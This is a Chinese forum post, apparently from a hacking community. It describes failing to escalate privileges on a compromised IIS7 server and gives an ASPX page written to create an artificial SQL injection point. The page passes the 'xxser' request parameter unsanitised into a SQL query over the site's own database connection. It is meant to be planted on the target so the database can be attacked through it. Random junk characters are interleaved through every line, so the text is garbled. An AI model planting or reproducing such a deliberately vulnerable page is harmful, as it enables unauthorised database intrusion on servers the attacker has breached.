昨天跟4z1看一个站点,提权很难提,看了整整5个小时,无果。 2008+iis7,无sa,无root,无各种服务。。。4 a/ o% A, K1 Y) q S* K2 T' z. w
其实中用到了aspx构造注射来跨站,网上找了一堆代码,没一个能用的。
* s9 U* z2 r1 I! g6 j1 N. `# H1 K# e代码量不多,自己写个拉倒了。烦死了。
9 e: ^# X% |1 J9 }6 ~% P7 o' ^3 M9 ]6 K: u
- C1 ^# Y' q4 }5 d5 D9 H<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
7 K+ E& B! O# l<html xmlns="http://www.w3.org/1999/xhtml">
i9 K" z* M/ W' Q5 ~8 g3 ]% m( Q<head runat="server">
% J6 T/ ^. m3 ~$ `$ ]. e <title>暗影aspx构造注射专用页面</title>0 F" p2 X, o+ T9 d
</head> x6 ~/ P J9 g; ?( N
<body>
2 K' ]) y$ G# }+ O* ]3 X; U <form id="form1" runat="server">& j. [" _5 r. B. ^# G* @# ~$ \
<div>* @+ E# d7 u# I0 [$ i
<script language="c#" runat="server">) \! j5 H) \" o+ N" W1 t# E( J
/ W! n: U2 z! V& H. Z void page_init(object sender, EventArgs e)
2 F! L- s7 X. j% | U0 v {9 B, ]4 y4 }) L7 f8 k$ E3 z
% n X" T5 b4 [
System.Data.SqlClient.SqlConnection conn = new System.Data.SqlClient.SqlConnection();
: j; S2 `6 s d; Q! o6 E+ P; z
; d3 s/ ]% a& I! m+ z9 n conn.ConnectionString = ConfigurationManager.ConnectionStrings["连接名"].ToString();" t k/ A$ s! {; @& |) S6 G) j
conn.Open();" I: M( Z8 {+ r/ ^
* f9 o+ J) |% \. \, I2 G% j
string i = this.Page.Request.Params["xxser"]; //这里是参数?xxser=1
7 x7 _. D' {% j |) ^2 V/ ?$ ^
~, m; H, O' p5 x8 O System.Data.SqlClient.SqlCommand command = new System.Data.SqlClient.SqlCommand("select * from [表] where 列名= " + i, conn);& d7 b* o, s' e) w: Z3 P8 R
int x = command.ExecuteNonQuery();0 `6 k3 _3 a& S
Response.Write(i+"\n");# O/ f. ~9 b& _" q: ]" { h
Response.Write(x); v. D7 z5 z' c& m
conn.Close();3 I$ J& Q: V, c8 i6 v. e
}
" B# X4 w* k9 D- }" G; d
[ V* w2 m, a- |6 \ </script>
% b1 V, ]4 e& U* J: V* o </div> W) O5 z/ j% n+ a2 H1 B
</form>
" F5 F# H! W8 b9 J* Z- p7 o" r</body>
; P9 G: _' U% N L8 y5 x: M) Y</html>2 F+ `# s1 i' ?5 i; A. v
|
发表于 2013-3-20 21:32:01
收藏
支持
反对